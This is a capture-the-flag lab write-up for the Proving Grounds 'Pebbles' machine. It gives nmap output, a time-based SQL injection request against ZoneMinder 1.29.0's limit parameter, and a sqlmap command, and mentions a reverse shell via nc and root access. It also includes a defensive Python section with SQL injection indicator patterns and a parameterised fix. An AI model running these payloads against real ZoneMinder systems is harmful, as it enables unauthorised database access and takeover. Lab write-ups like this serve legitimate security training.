# Proving grounds Practice: Pebbles

Proving grounds Practice - Pebbles CTF writeup.

### Nmap

```sh
21/tcp   open  ftp     vsftpd 3.0.3
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aacf5a9347180e7f3d6da5aff86aa51e (RSA)
|   256 c7636c8ab5a76f05bfd0e390b5b89658 (ECDSA)
|_  256 93b26a1163861b5ef5895852897ff342 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 7EC7ACEA6BB719ECE5FCE0009B57206B
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Pebbles
3305/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
8080/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tomcat
|_http-favicon: Apache Tomcat
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

### Directory Fuzzing

![img](/files/sUZvYggW0Lg1f64snBBD)

**ZoneMinder v1.29.0**

![img](/files/lQEhfgDFgCVD4dYyiNOD)

ZoneMinder v1.29.0 is vulnerable to SQL injection.

**Searchsploit**

![img](/files/8M6lxWKcHsWrLf5BVodx)

### Construct and Exploit SQL Injection vulnerability

#### Request

```http
POST /zm/index.php HTTP/1.1
Host: 192.168.210.52
Content-Length: 112
Accept: application/json
X-Requested-With: XMLHttpRequest
X-Request: JSON
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.210.52
Referer: http://192.168.210.52/zm/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: zmSkin=classic; zmCSS=classic; ZMSESSID=e6s5540cs098ev3kra5sksjme6
Connection: close

view=request&request=log&task=query&limit=100;(SELECT * FROM (SELECT(SLEEP(5)))OQkj)#&minTime=1466674406.084434
```

#### Response

![img](/files/nbF6QiplyfEt3hE9bdrq)

The exploit advisory says the `limit` parameter is injectable, so the exploitation can be automated with sqlmap.

```sh
sqlmap -u http://192.168.210.52/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=1" -p limit --batch --dbs --risk 3 --level 4
```

![img](/files/XkZDBOZA33Z33KXwGdDs)
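From the defender's side, the request above shows two things worth checking for: the `limit` value carries a time-delay function and a stacked statement, and the application evidently interpolated it into SQL text. The following is an added example, not code from the writeup or from ZoneMinder. It takes constructed sample request bodies modelled on the page's parameters, flags the injection indicators a WAF rule or log review would look for, and shows a hardened handler (an assumed design) that validates `limit`/`minTime` as numbers and binds them as query parameters against an in-memory SQLite table standing in for the Logs table.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed sample POST bodies for the log query endpoint. The second one
# carries the page's time-based blind injection in `limit`; the others are
# benign or simply malformed.
SAMPLE_BODIES = [
    "view=request&request=log&task=query&limit=100&minTime=1466674406.084434",
    "view=request&request=log&task=query&limit=100;(SELECT * FROM (SELECT(SLEEP(5)))OQkj)#&minTime=1466674406.084434",
    "view=request&request=log&task=query&limit=50&minTime=not-a-number",
]

def parse_form_body(body: str) -> dict:
    """Split an application/x-www-form-urlencoded body on '&' only.
    Done by hand so a ';' inside a value (as in the payload above) stays part
    of that value instead of being treated as a separator."""
    params = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params

# Indicator patterns for the `limit` field: time-delay functions, stacked
# statements and comment terminators. Assumed rule set, not ZoneMinder's.
SQLI_INDICATORS = {
    "time_delay": re.compile(r"\b(SLEEP|BENCHMARK|WAITFOR)\s*\(", re.I),
    "stacked_statement": re.compile(r";\s*\(?\s*(SELECT|INSERT|UPDATE|DELETE|UNION)\b", re.I),
    "comment_terminator": re.compile(r"(#|--\s|/\*)"),
}

def sqli_indicators(value: str) -> list:
    """Return the names of the indicator patterns that match a value."""
    return [name for name, rx in SQLI_INDICATORS.items() if rx.search(value)]

def validate_log_query(body: str) -> dict:
    """Hardened input handling (assumed design): `limit` must be a small
    positive integer and `minTime` a non-negative number. Anything else is
    rejected before it can reach SQL."""
    params = parse_form_body(body)
    limit_raw = params.get("limit", "100")
    if not re.fullmatch(r"[1-9][0-9]{0,3}", limit_raw):
        raise ValueError("limit rejected: %r" % limit_raw)
    min_time_raw = params.get("minTime", "0")
    if not re.fullmatch(r"[0-9]+(\.[0-9]+)?", min_time_raw):
        raise ValueError("minTime rejected: %r" % min_time_raw)
    return {"limit": int(limit_raw), "minTime": float(min_time_raw)}

def query_logs(conn: sqlite3.Connection, body: str) -> list:
    """Run the log query with bound parameters only: the SQL text is fixed,
    and `limit` is passed as an integer through a '?' placeholder."""
    p = validate_log_query(body)
    cur = conn.execute(
        "SELECT Id, Message FROM Logs WHERE TimeKey >= ? ORDER BY TimeKey DESC LIMIT ?",
        (p["minTime"], p["limit"]),
    )
    return cur.fetchall()

def build_demo_db() -> sqlite3.Connection:
    """In-memory table standing in for the Logs table (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Logs (Id INTEGER PRIMARY KEY, TimeKey REAL, Message TEXT)")
    conn.executemany(
        "INSERT INTO Logs (TimeKey, Message) VALUES (?, ?)",
        [(1466674000.0, "old entry"),
         (1466674500.0, "camera 1 started"),
         (1466674600.0, "camera 2 started")],
    )
    return conn

def triage_bodies(bodies) -> list:
    """For each body: which indicators fired on `limit`, and whether the
    hardened validator would have accepted the request."""
    results = []
    for body in bodies:
        limit_value = parse_form_body(body).get("limit", "")
        try:
            validate_log_query(body)
            accepted = True
        except ValueError:
            accepted = False
        results.append({"indicators": sqli_indicators(limit_value), "accepted": accepted})
    return results

if __name__ == "__main__":
    conn = build_demo_db()
    for body, verdict in zip(SAMPLE_BODIES, triage_bodies(SAMPLE_BODIES)):
        print(verdict, "<-", body[:60])
    print(query_logs(conn, SAMPLE_BODIES[0]))
```

The indicator scan is what you would run over captured request bodies or access logs to spot this class of probe; the validator plus bound parameters is the fix that removes the vulnerability class, since a rejected or integer-only `limit` can never change the statement the database executes.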

**Obtain reverse shell via sqlmap**

![img](/files/qhVK80KYu1ayizCeUnas)

**Transfer nc and obtain reverse shell**

![img](/files/SvoosKOrcWP2CxQh6zsw)

**Root Obtained**

Use port `3305` to get the reverse connection successfully; other ports are not allowed on the system.

![img](/files/7oVEIrwRodIRHm5IWTc8)

Thanks for reading!

For more updates and insights, follow me on Twitter: [@thevillagehacker](https://twitter.com/thevillagehackr).


